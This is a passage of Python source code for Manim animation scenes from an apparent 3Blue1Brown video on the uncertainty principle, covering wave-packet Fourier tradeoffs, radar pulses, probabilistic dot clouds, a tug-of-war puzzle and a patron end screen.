mathy, "",
bubble_kwargs = {"width" : 5},
look_at_arg = morty.eyes,
),
morty.change, "happy",
aops_logo.shift, 1.5*UP + 0.5*RIGHT
)
self.play(Blink(mathy))
self.wait()
self.play(
RemovePiCreatureBubble(
mathy, target_mode = "raise_right_hand"
),
aops_logo.to_corner, UP+RIGHT,
aops_logo.shift, MED_SMALL_BUFF*DOWN,
GrowFromPoint(book, mathy.get_corner(UP+LEFT)),
)
self.play(morty.change, "pondering", book)
self.wait(3)
self.play(Blink(mathy))
self.wait()
self.play(
Animation(
BackgroundRectangle(book, fill_opacity = 1),
remover = True
),
FadeOut(book),
)
print(self.num_plays)
self.play(
FadeOut(words),
ShowCreation(rect),
morty.restore,
morty.change, "happy", rect,
FadeOut(mathy),
)
self.wait(10)
self.play(ShowCreation(url_rect))
self.play(
FadeOut(url_rect),
url.get_part_by_tex("3b1b").set_color, BLUE,
)
self.wait(15)
class PuzzleStatement(Scene):
def construct(self):
aops_logo = AoPSLogo()
url = TextMobject("AoPS.com/3b1b")
url.next_to(aops_logo, UP)
group = VGroup(aops_logo, url)
group.to_edge(UP)
self.add(group)
words = TextMobject("""
AoPS must choose one of 20 people to send to a
tug-of-war tournament. We don't care who we send,
as long as we don't send our weakest person. \\\\ \\\\
Each person has a different strength, but we don't know
those strengths. We get 10 intramural 10-on-10 matches
to determine who we send. Can we make sure we don't send
the weakest person?
""", alignment = "")
words.set_width(FRAME_WIDTH - 2)
words.next_to(group, DOWN, LARGE_BUFF)
self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))
self.wait(2)
class UncertaintyEndScreen(PatreonEndScreen):
CONFIG = {
"specific_patrons" : [
"CrypticSwarm",
"Ali Yahya",
"Juan Benet",
"Markus Persson",
"Damion Kistler",
"Burt Humburg",
"Yu Jun",
"Dave Nicponski",
"Kaustuv DeBiswas",
"Joseph John Cox",
"Luc Ritchie",
"Achille Brighton",
"Rish Kundalia",
"Yana Chernobilsky",
"Shìmín Kuang",
"Mathew Bramson",
"Jerry Ling",
"Mustafa Mahdi",
"Meshal Alshammari",
"Mayank M. Mehrotra",
"Lukas Biewald",
"Robert Teed",
"Samantha D. Suplee",
"Mark Govea",
"John Haley",
"Julian Pulgarin",
"Jeff Linse",
"Cooper Jones",
"Desmos ",
"Boris Veselinovich",
"Ryan Dahl",
"Ripta Pasay",
"Eric Lavault",
"Randall Hunt",
"Andrew Busey",
"Mads Elvheim",
"Tianyu Ge",
"Awoo",
"Dr. David G. Stork",
"Linh Tran",
"Jason Hise",
"Bernd Sing",
"James H. Park",
"Ankalagon ",
"Mathias Jansson",
"David Clark",
"Ted Suzman",
"Eric Chow",
"Michael Gardner",
"David Kedmey",
"Jonathan Eppele",
"Clark Gaebel",
"Jordan Scales",
"Ryan Atallah",
"supershabam ",
"1stViewMaths",
"Jacob Magnuson",
"Chloe Zhou",
"Ross Garber",
"Thomas Tarler",
"Isak Hietala",
"Egor Gumenuk",
"Waleed Hamied",
"Oliver Steele",
"Yaw Etse",
"David B",
"Delton Ding",
"James Thornton",
"Felix Tripier",
"Arthur Zey",
"George Chiesa",
"Norton Wang",
"Kevin Le",
"Alexander Feldman",
"David MacCumber",
"Jacob Kohl",
"Frank Secilia",
"George John",
"Akash Kumar",
"Britt Selvitelle",
"Jonathan Wilson",
"Michael Kunze",
"Giovanni Filippi",
"Eric Younge",
"Prasant Jagannath",
"Andrejs olins",
"Cody Brocious",
],
}
class Thumbnail(Scene):
def construct(self):
uncertainty_principle = TextMobject("Uncertainty \\\\", "principle")
uncertainty_principle[1].shift(SMALL_BUFF*UP)
quantum = TextMobject("Quantum")
VGroup(uncertainty_principle, quantum).scale(2.5)
uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)
quantum.to_edge(DOWN, MED_LARGE_BUFF)
arrow = TexMobject("\\Downarrow")
arrow.scale(4)
arrow.move_to(Line(
uncertainty_principle.get_bottom(),
quantum.get_top(),
))
cross = Cross(arrow)
cross.set_stroke(RED, 20)
is_word, not_word = is_not = TextMobject("is", "\\emph{NOT}")
is_not.scale(3)
is_word.move_to(arrow)
# is_word.shift(0.6*UP)
not_word.set_color(RED)
not_word.set_stroke(RED, 3)
not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)
not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)
dot_cloud = ProbabalisticDotCloud(
n_copies = 1000,
)
dot_gdw = dot_cloud.gaussian_distribution_wrapper
# dot_gdw.rotate(3*DEGREES)
dot_gdw.rotate(25*DEGREES)
# dot_gdw.scale(2)
dot_gdw.scale(2)
# dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)
dot_gdw.move_to(quantum)
def get_func(a):
return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)
axes = Axes(
x_min = -6, x_max = 6,
x_axis_config = {"unit_size" : 0.25}
)
graphs = VGroup(*[
axes.get_graph(get_func(a))
for a in (10, 3, 1, 0.3, 0.1,)
])
graphs.arrange(DOWN, buff = 0.6)
graphs.to_corner(UP+LEFT)
graphs.set_color_by_gradient(BLUE_B, BLUE_D)
frequency_axes = Axes(
x_min = 0, x_max = 2,
x_axis_config = {"unit_size" : 1}
)
fourier_graphs = VGroup(*[
get_fourier_graph(
frequency_axes, graph.underlying_function,
t_min = -10, t_max = 10,
)
for graph in graphs
])
for graph, fourier_graph in zip(graphs, fourier_graphs):
fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)
fourier_graph.scale(3)
fourier_graph.stretch(3, 1)
fourier_graph.move_to(graph)
fourier_graph.to_edge(RIGHT)
self.add(graphs, fourier_graphs)
self.add(dot_cloud)
self.add(
uncertainty_principle, quantum,
)
self.add(arrow, cross)
# self.add(is_word)
# self.add(is_not)
| 32.319409
| 95
| 0.555994
|
import scipy
from manimlib.imports import *
from from_3b1b.old.fourier import *
import warnings
warnings.warn("""
Warning: This file makes use of
ContinualAnimation, which has since
been deprecated
""")
FREQUENCY_COLOR = RED
USE_ALMOST_FOURIER_BY_DEFAULT = False
class GaussianDistributionWrapper(Line):
CONFIG = {
"stroke_width" : 0,
"mu" : ORIGIN,
"sigma" : RIGHT,
}
def __init__(self, **kwargs):
Line.__init__(self, ORIGIN, RIGHT, **kwargs)
self.change_parameters(self.mu, self.sigma)
def change_parameters(self, mu = None, sigma = None):
curr_mu, curr_sigma = self.get_parameters()
mu = mu if mu is not None else curr_mu
sigma = sigma if sigma is not None else curr_sigma
self.put_start_and_end_on(mu - sigma, mu + sigma)
return self
def get_parameters(self):
center, end = self.get_center(), self.get_end()
return center, end-center
def get_random_points(self, size = 1):
mu, sigma = self.get_parameters()
return np.array([
np.array([
np.random.normal(mu_coord, sigma_coord)
for mu_coord, sigma_coord in zip(mu, sigma)
])
for x in range(size)
])
class ProbabalisticMobjectCloud(ContinualAnimation):
CONFIG = {
"fill_opacity" : 0.25,
"n_copies" : 100,
"gaussian_distribution_wrapper_config" : {},
"time_per_change" : 1./60,
"start_up_time" : 0,
}
def __init__(self, prototype, **kwargs):
digest_config(self, kwargs)
fill_opacity = self.fill_opacity or prototype.get_fill_opacity()
if "mu" not in self.gaussian_distribution_wrapper_config:
self.gaussian_distribution_wrapper_config["mu"] = prototype.get_center()
self.gaussian_distribution_wrapper = GaussianDistributionWrapper(
**self.gaussian_distribution_wrapper_config
)
self.time_since_last_change = np.inf
group = VGroup(*[
prototype.copy().set_fill(opacity = fill_opacity)
for x in range(self.n_copies)
])
ContinualAnimation.__init__(self, group, **kwargs)
self.update_mobject(0)
def update_mobject(self, dt):
self.time_since_last_change += dt
if self.time_since_last_change < self.time_per_change:
return
self.time_since_last_change = 0
group = self.mobject
points = self.gaussian_distribution_wrapper.get_random_points(len(group))
for mob, point in zip(group, points):
self.update_mobject_by_point(mob, point)
return self
def update_mobject_by_point(self, mobject, point):
mobject.move_to(point)
return self
class ProbabalisticDotCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : BLUE,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
dot = Dot(color = self.color)
ProbabalisticMobjectCloud.__init__(self, dot)
class ProbabalisticVectorCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : RED,
"n_copies" : 20,
"fill_opacity" : 0.5,
"center_func" : lambda : ORIGIN,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
vector = Vector(
RIGHT, color = self.color,
max_tip_length_to_length_ratio = 1,
)
ProbabalisticMobjectCloud.__init__(self, vector)
def update_mobject_by_point(self, vector, point):
vector.put_start_and_end_on(
self.center_func(),
point
)
class RadarDish(SVGMobject):
CONFIG = {
"file_name" : "radar_dish",
"fill_color" : LIGHT_GREY,
"stroke_color" : WHITE,
"stroke_width" : 1,
"height" : 1,
}
class Plane(SVGMobject):
CONFIG = {
"file_name" : "plane",
"color" : LIGHT_GREY,
"height" : 1,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.rotate(-TAU/4)
class FalconHeavy(SVGMobject):
CONFIG = {
"file_name" : "falcon_heavy",
"color" : WHITE,
"logo_color" : BLUE_E,
"height" : 1.5,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.logo = self[-9:]
self.logo.set_color(self.logo_color)
class RadarPulseSingleton(ContinualAnimation):
CONFIG = {
"speed" : 3.0,
"direction" : RIGHT,
"start_up_time" : 0,
"fade_in_time" : 0.5,
"color" : WHITE,
"stroke_width" : 3,
}
def __init__(self, radar_dish, target, **kwargs):
digest_config(self, kwargs)
self.direction = self.direction/get_norm(self.direction)
self.radar_dish = radar_dish
self.target = target
self.reflection_distance = None
self.arc = Arc(
start_angle = -30*DEGREES,
angle = 60*DEGREES,
)
self.arc.set_height(0.75*radar_dish.get_height())
self.arc.move_to(radar_dish, UP+RIGHT)
self.start_points = np.array(self.arc.points)
self.start_center = self.arc.get_center()
self.finished = False
ContinualAnimation.__init__(self, self.arc, **kwargs)
def update_mobject(self, dt):
arc = self.arc
total_distance = self.speed*self.internal_time
arc.points = np.array(self.start_points)
arc.shift(total_distance*self.direction)
if self.internal_time < self.fade_in_time:
alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)
arc.set_stroke(self.color, alpha*self.stroke_width)
if self.reflection_distance is None:
arc_point = arc.get_edge_center(self.direction)
target_point = self.target.get_edge_center(-self.direction)
arc_distance = np.dot(arc_point, self.direction)
target_distance = np.dot(target_point, self.direction)
if arc_distance > target_distance:
self.reflection_distance = target_distance
if self.reflection_distance is not None:
delta_distance = total_distance - self.reflection_distance
point_distances = np.dot(self.direction, arc.points.T)
diffs = point_distances - self.reflection_distance
shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)
arc.points += shift_vals
#Check if done
arc_point = arc.get_edge_center(-self.direction)
if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):
self.finished = True
self.arc.fade(1)
def is_finished(self):
return self.finished
class RadarPulse(ContinualAnimation):
CONFIG = {
"n_pulse_singletons" : 8,
"frequency" : 0.05,
"colors" : [BLUE, YELLOW]
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
colors = color_gradient(self.colors, self.n_pulse_singletons)
self.pulse_singletons = [
RadarPulseSingleton(*args, color = color, **kwargs)
for color in colors
]
pluse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])
ContinualAnimation.__init__(self, pluse_mobjects, **kwargs)
def update_mobject(self, dt):
for i, ps in enumerate(self.pulse_singletons):
ps.internal_time = self.internal_time - i*self.frequency
ps.update_mobject(dt)
def is_finished(self):
return all([ps.is_finished() for ps in self.pulse_singletons])
class MultipleFlashes(Succession):
CONFIG = {
"run_time_per_flash" : 1.0,
"num_flashes" : 3,
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
kwargs["run_time"] = self.run_time_per_flash
Succession.__init__(self, *[
Flash(*args, **kwargs)
for x in range(self.num_flashes)
])
class TrafficLight(SVGMobject):
CONFIG = {
"file_name" : "traffic_light",
"height" : 0.7,
"post_height" : 2,
"post_width" : 0.05,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
post = Rectangle(
height = self.post_height,
width = self.post_width,
stroke_width = 0,
fill_color = WHITE,
fill_opacity = 1,
)
self.move_to(post.get_top(), DOWN)
self.add_to_back(post)
###################
class MentionUncertaintyPrinciple(TeacherStudentsScene):
def construct(self):
title = TextMobject("Heisenberg Uncertainty Principle")
title.to_edge(UP)
dot_cloud = ProbabalisticDotCloud()
vector_cloud = ProbabalisticVectorCloud(
gaussian_distribution_wrapper_config = {"sigma_x" : 0.2},
center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],
)
for cloud in dot_cloud, vector_cloud:
cloud.gaussian_distribution_wrapper.next_to(
title, DOWN, 2*LARGE_BUFF
)
vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)
def get_brace_text_group_update(gdw, vect, text, color):
brace = Brace(gdw, vect)
text = brace.get_tex("2\\sigma_{\\text{%s}}"%text, buff = SMALL_BUFF)
group = VGroup(brace, text)
def update_group(group):
brace, text = group
brace.match_width(gdw, stretch = True)
brace.next_to(gdw, vect)
text.next_to(brace, vect, buff = SMALL_BUFF)
group.set_color(color)
return Mobject.add_updater(group, update_group)
dot_brace_anim = get_brace_text_group_update(
dot_cloud.gaussian_distribution_wrapper,
DOWN, "position", dot_cloud.color
)
vector_brace_anim = get_brace_text_group_update(
vector_cloud.gaussian_distribution_wrapper,
UP, "momentum", vector_cloud.color
)
self.add(title)
self.add(dot_cloud)
self.play(
Write(title),
self.teacher.change, "raise_right_hand",
self.get_student_changes(*["pondering"]*3)
)
self.play(
Write(dot_brace_anim.mobject, run_time = 1)
)
self.add(dot_brace_anim)
self.wait()
# self.wait(2)
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 2,
)
self.wait()
self.add(vector_cloud)
self.play(
FadeIn(vector_brace_anim.mobject)
)
self.add(vector_brace_anim)
self.play(
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : RIGHT},
self.get_student_changes(*3*["confused"]),
run_time = 3,
)
#Back and forth
for x in range(2):
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 2*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 3,
)
self.change_student_modes("thinking", "erm", "sassy")
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 1*RIGHT},
run_time = 3,
)
self.wait()
class FourierTradeoff(Scene):
CONFIG = {
"show_text" : True,
"complex_to_real_func" : lambda z : z.real,
"widths" : [6, 0.02, 1],
}
def construct(self):
#Setup axes
time_mean = 4
time_axes = Axes(
x_min = 0,
x_max = 2*time_mean,
x_axis_config = {"unit_size" : 1.5},
y_min = -2,
y_max = 2,
y_axis_config = {"unit_size" : 0.5}
)
time_label = TextMobject("Time")
time_label.scale(1.5)
time_label.next_to(
time_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
time_axes.add(time_label)
time_axes.center().to_edge(UP)
time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))
frequency_axes = Axes(
x_min = 0,
x_max = 8,
x_axis_config = {"unit_size" : 1.5},
y_min = -0.025,
y_max = 0.075,
y_axis_config = {
"unit_size" : 30,
"tick_frequency" : 0.025,
},
color = TEAL,
)
frequency_label = TextMobject("Frequency")
frequency_label.scale(1.5)
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
frequency_label.set_color(FREQUENCY_COLOR)
frequency_axes.add(frequency_label)
frequency_axes.move_to(time_axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
frequency_axes.x_axis.add_numbers()
# Graph information
#x-coordinate of this point determines width of wave_packet graph
width_tracker = ExponentialValueTracker(0.5)
get_width = width_tracker.get_value
def get_wave_packet_function():
factor = 1./get_width()
return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)
def get_wave_packet():
graph = time_axes.get_graph(
get_wave_packet_function(),
num_graph_points = 200,
)
graph.set_color(YELLOW)
return graph
time_radius = 10
def get_wave_packet_fourier_transform():
return get_fourier_graph(
frequency_axes,
get_wave_packet_function(),
t_min = time_mean - time_radius,
t_max = time_mean + time_radius,
n_samples = 2*time_radius*17,
complex_to_real_func = self.complex_to_real_func,
color = FREQUENCY_COLOR,
)
wave_packet = get_wave_packet()
wave_packet_update = UpdateFromFunc(
wave_packet,
lambda g : Transform(g, get_wave_packet()).update(1)
)
fourier_graph = get_wave_packet_fourier_transform()
fourier_graph_update = UpdateFromFunc(
fourier_graph,
lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)
)
arrow = Arrow(
wave_packet, frequency_axes.coords_to_point(
4, frequency_axes.y_max/2,
),
color = FREQUENCY_COLOR,
)
fourier_words = TextMobject("Fourier Transform")
fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)
sub_words = TextMobject("(To be explained shortly)")
sub_words.set_color(BLUE)
sub_words.scale(0.75)
sub_words.next_to(fourier_words, DOWN)
#Draw items
self.add(time_axes, frequency_axes)
self.play(ShowCreation(wave_packet, rate_func = double_smooth))
anims = [ReplacementTransform(
wave_packet.copy(), fourier_graph
)]
if self.show_text:
anims += [
GrowArrow(arrow),
Write(fourier_words, run_time = 1)
]
self.play(*anims)
# self.play(FadeOut(arrow))
self.wait()
for width in self.widths:
self.play(
width_tracker.set_value, width,
wave_packet_update,
fourier_graph_update,
run_time = 3
)
if sub_words not in self.mobjects and self.show_text:
self.play(FadeIn(sub_words))
else:
self.wait()
self.wait()
class ShowPlan(PiCreatureScene):
def construct(self):
self.add_title()
words = self.get_words()
self.play_sound_anims(words[0])
self.play_doppler_anims(words[1])
self.play_quantum_anims(words[2])
def add_title(self):
title = TextMobject("The plan")
title.scale(1.5)
title.to_edge(UP)
h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)
h_line.next_to(title, DOWN)
self.add(title, h_line)
def get_words(self):
trips = [
("sound waves", "(time vs. frequency)", YELLOW),
("Doppler radar", "(distance vs. velocity)", GREEN),
("quantum particles", "(position vs. momentum)", BLUE),
]
words = VGroup()
for topic, tradeoff, color in trips:
word = TextMobject("Uncertainty for", topic, tradeoff)
word[1:].set_color(color)
word[2].scale(0.75)
word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)
words.add(word)
words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)
words.to_edge(LEFT)
return words
def play_sound_anims(self, word):
morty = self.pi_creature
wave = FunctionGraph(
lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),
x_min = 0, x_max = 30,
step_size = 0.001,
)
wave.next_to(word, RIGHT)
rect = BackgroundRectangle(wave, fill_opacity = 1)
rect.stretch(2, 1)
rect.next_to(wave, LEFT, buff = 0)
always_shift(wave, direction=LEFT, rate=5)
wave_fader = UpdateFromAlphaFunc(
wave,
lambda w, a : w.set_stroke(width = 3*a)
)
checkmark = self.get_checkmark(word)
self.add(wave)
self.add_foreground_mobjects(rect, word)
self.play(
Animation(word),
wave_fader,
morty.change, "raise_right_hand", word
)
self.wait(2)
wave_fader.rate_func = lambda a : 1-smooth(a)
self.add_foreground_mobjects(checkmark)
self.play(
Write(checkmark),
morty.change, "happy",
wave_fader,
)
self.remove_foreground_mobjects(rect, word)
self.add(word)
self.wait()
def play_doppler_anims(self, word):
morty = self.pi_creature
radar_dish = RadarDish()
radar_dish.next_to(word, DOWN, aligned_edge = LEFT)
target = Plane()
# target.match_height(radar_dish)
target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)
always_shift(target, direction = RIGHT, rate = 1.25)
pulse = RadarPulse(radar_dish, target)
checkmark = self.get_checkmark(word)
self.add(target)
self.play(
Write(word),
DrawBorderThenFill(radar_dish),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = a)
),
morty.change, "pondering",
run_time = 1
)
self.add(pulse)
count = it.count() #TODO, this is not a great hack...
while not pulse.is_finished() and next(count) < 15:
self.play(
morty.look_at, pulse.mobject,
run_time = 0.5
)
self.play(
Write(checkmark),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = 1-a)
),
FadeOut(radar_dish),
morty.change, "happy"
)
self.wait()
def play_quantum_anims(self, word):
morty = self.pi_creature
dot_cloud = ProbabalisticDotCloud()
gdw = dot_cloud.gaussian_distribution_wrapper
gdw.next_to(word, DOWN, MED_LARGE_BUFF)
gdw.rotate(5*DEGREES)
gdw.save_state()
gdw.scale(0)
checkmark = self.get_checkmark(word)
ish = TextMobject("$\\dots$ish")
ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)
self.add(dot_cloud)
self.play(
Write(word),
FadeIn(dot_cloud.mobject),
morty.change, "confused",
)
self.play(gdw.restore, run_time = 2)
self.play(Write(checkmark))
self.wait()
self.play(
Write(ish),
morty.change, 'maybe'
)
self.wait(6)
##
def get_checkmark(self, word):
checkmark = TexMobject("\\checkmark")
checkmark.set_color(GREEN)
checkmark.scale(1.25)
checkmark.next_to(word[1], UP+RIGHT, buff = 0)
return checkmark
class StartWithIntuition(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"You already \\\\ have this \\\\ intuition",
bubble_kwargs = {
"height" : 3.5,
"width" : 3,
},
)
self.change_student_modes("pondering", "erm", "maybe")
self.look_at(VectorizedPoint(4*LEFT + 2*UP))
self.wait(5)
class TwoCarsAtRedLight(Scene):
CONFIG = {
"text_scale_val" : 0.75,
}
def construct(self):
self.pull_up_behind()
self.flash_in_sync_short_time()
self.show_low_confidence()
self.flash_in_sync_long_time()
self.show_high_confidence()
def pull_up_behind(self):
#Setup Traffic light
traffic_light = TrafficLight()
traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)
source_point = VectorizedPoint(
traffic_light[2].get_right()
)
screen = Line(ORIGIN, UP)
screen.next_to(source_point, RIGHT, LARGE_BUFF)
red_light = Spotlight(
color = RED,
source_point = source_point,
radius = 0.5,
screen = screen,
num_levels = 20,
opacity_function = lambda r : 1/(10*r**2+1)
)
red_light.fade(0.5)
red_light.rotate(TAU/2, about_edge = LEFT)
self.add(red_light, traffic_light)
#Setup cars
car1, car2 = cars = self.cars = VGroup(*[
Car() for x in range(2)
])
cars.arrange(RIGHT, buff = LARGE_BUFF)
cars.next_to(
traffic_light, LEFT,
buff = LARGE_BUFF, aligned_edge = DOWN
)
car2.pi_creature.set_color(GREY_BROWN)
car1.start_point = car1.get_corner(DOWN+RIGHT)
car1.shift(FRAME_X_RADIUS*LEFT)
#Pull up car
self.add(cars)
self.play(
SwitchOn(
red_light,
rate_func = squish_rate_func(smooth, 0, 0.3),
),
Animation(traffic_light),
self.get_flashes(car2, num_flashes = 3),
MoveCar(
car1, car1.start_point,
run_time = 3,
rate_func = rush_from,
)
)
def flash_in_sync_short_time(self):
car1, car2 = cars = self.cars
#Setup axes
axes = Axes(
x_min = 0,
x_max = 5,
y_min = 0,
y_max = 2,
y_axis_config = {
"tick_frequency" : 0.5,
},
)
axes.x_axis.add_numbers(1, 2, 3)
time_label = TextMobject("Time")
time_label.scale(self.text_scale_val)
time_label.next_to(axes.x_axis.get_right(), DOWN)
y_title = TextMobject("Signal")
y_title.scale(self.text_scale_val)
y_title.next_to(axes.y_axis, UP, SMALL_BUFF)
axes.add(time_label, y_title)
axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)
graph = axes.get_graph(
self.get_multispike_function(list(range(1, 4))),
x_min = 0.8,
x_max = 3.8,
)
graph.set_color(YELLOW)
#Label short duration
brace = Brace(Line(
axes.input_to_graph_point(1, graph),
axes.input_to_graph_point(3, graph),
), UP)
text = TextMobject("Short duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, SMALL_BUFF)
text.align_to(
axes.coords_to_point(0.25, 0), LEFT
)
self.play(
self.get_flashes(car1, num_flashes = 2),
self.get_flashes(car2, num_flashes = 2),
LaggedStartMap(FadeIn, VGroup(
axes, time_label, y_title,
))
)
self.play(
self.get_flashes(car1, num_flashes = 3),
self.get_flashes(car2, num_flashes = 3),
ShowCreation(graph, rate_func=linear, run_time = 3)
)
self.play(
self.get_flashes(car1, num_flashes = 10),
self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),
GrowFromCenter(brace),
Write(text),
)
self.time_axes = axes
self.time_graph = graph
self.time_graph_label = VGroup(
brace, text
)
def show_low_confidence(self):
car1, car2 = cars = self.cars
time_axes = self.time_axes
#Setup axes
frequency_axes = Axes(
x_min = 0,
x_max = 3,
y_min = 0,
y_max = 1.5,
y_axis_config = {
"tick_frequency" : 0.5,
}
)
frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)
frequency_axes.set_color(LIGHT_GREY)
frequency_label = TextMobject("Frequency")
frequency_label.scale(self.text_scale_val)
frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)
frequency_axes.add(
frequency_label,
VectorizedPoint(frequency_axes.y_axis.get_top())
)
frequency_axes.x_axis.add_numbers(1, 2)
frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-4*(x-1)**2),
x_min = 0,
x_max = 2,
)
frequency_graph.set_color(RED)
peak_point = frequency_axes.input_to_graph_point(
1, frequency_graph
)
#Setup label
label = TextMobject("Low confidence")
label.scale(self.text_scale_val)
label.move_to(peak_point + UP+RIGHT, DOWN)
label.match_color(frequency_graph)
arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)
arrow.match_color(frequency_graph)
self.play(
ReplacementTransform(
self.time_axes.copy(), frequency_axes
),
ReplacementTransform(
self.time_graph.copy(), frequency_graph
),
)
self.play(
Write(label),
GrowArrow(arrow)
)
self.wait()
self.frequency_axes = frequency_axes
self.frequency_graph = frequency_graph
self.frequency_graph_label = VGroup(
label, arrow
)
def flash_in_sync_long_time(self):
time_graph = self.time_graph
time_axes = self.time_axes
frequency_graph = self.frequency_graph
frequency_axes = self.frequency_axes
n_spikes = 12
new_time_graph = time_axes.get_graph(
self.get_multispike_function(list(range(1, n_spikes+1))),
x_min = 0.8,
x_max = n_spikes + 0.8,
)
new_time_graph.match_color(time_graph)
new_frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-500*(x-1)**2),
x_min = 0,
x_max = 2,
num_anchors = 500,
)
new_frequency_graph.match_color(self.frequency_graph)
def pin_freq_graph_end_points(freq_graph):
freq_graph.points[0] = frequency_axes.coords_to_point(0, 0)
freq_graph.points[-1] = frequency_axes.coords_to_point(2, 0)
self.play(LaggedStartMap(
FadeOut, VGroup(
self.time_graph_label,
self.frequency_graph_label,
self.time_graph,
)
))
self.play(
ApplyMethod(
self.time_axes.x_axis.stretch, 2.5, 0,
{"about_edge" : LEFT},
run_time = 4,
rate_func = squish_rate_func(smooth, 0.3, 0.6),
),
UpdateFromFunc(
self.time_axes.x_axis.tip,
lambda m : m.move_to(
self.time_axes.x_axis.get_right(),
LEFT
)
),
ShowCreation(
new_time_graph,
run_time = n_spikes,
rate_func=linear,
),
ApplyMethod(
frequency_graph.stretch, 0.1, 0,
run_time = n_spikes,
),
UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),
*[
self.get_flashes(car, num_flashes = n_spikes)
for car in self.cars
]
)
self.new_time_graph = new_time_graph
self.new_frequency_graph = new_frequency_graph
def show_high_confidence(self):
#Frequency stuff
arrow = self.frequency_graph_label[1]
label = TextMobject("High confidence")
label.scale(self.text_scale_val)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(arrow)
frequency_axes = self.frequency_axes
#Time stuff
new_time_graph = self.new_time_graph
brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)
text = TextMobject("Long duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, buff = SMALL_BUFF)
self.play(
FadeIn(label),
GrowArrow(arrow),
*list(map(self.get_flashes, self.cars))
)
self.play(
GrowFromCenter(brace),
Write(text, run_time = 1),
*list(map(self.get_flashes, self.cars))
)
self.play(*[
self.get_flashes(car, num_flashes = 10)
for car in self.cars
])
###
def get_flashes(self, car, colors = [YELLOW, RED], num_flashes = 1, **kwargs):
return AnimationGroup(*[
MultipleFlashes(light, color, num_flashes = num_flashes, **kwargs)
for light, color in zip(car.get_lights(), colors)
])
def get_multispike_function(self, spike_times):
return lambda x : sum([
1.25*np.exp(-100*(x-m)**2)
for m in spike_times
])
class VariousMusicalNotes(Scene):
def construct(self):
freq = 20
# x-coordinate of this point represents log(a)
# where the bell curve component of the signal
# is exp(-a*(x**2))
graph_width_tracker = ExponentialValueTracker(1)
def get_graph():
a = graph_width_tracker.get_value()
return FunctionGraph(
lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,
step_size = 0.001,
)
graph = get_graph()
def graph_update(graph):
graph.points = get_graph().points
graph_update_anim = UpdateFromFunc(graph, graph_update)
def change_width_anim(width, **kwargs):
a = 2.0/(width**2)
return AnimationGroup(
ApplyMethod(graph_width_tracker.set_value, a),
graph_update_anim,
**kwargs
)
change_width_anim(FRAME_X_RADIUS).update(1)
graph_update_anim.update(0)
phrases = [
TextMobject(*words.split(" "))
for words in [
"Very clear frequency",
"Less clear frequency",
"Extremely unclear frequency",
]
]
#Show graphs and phrases
widths = [FRAME_X_RADIUS, 1, 0.2]
for width, phrase in zip(widths, phrases):
brace = Brace(Line(LEFT, RIGHT), UP)
brace.stretch(width, 0)
brace.next_to(graph.get_center(), UP, buff = 1.2)
phrase.next_to(brace, UP)
if width is widths[0]:
self.play(ShowCreation(graph, rate_func=linear)),
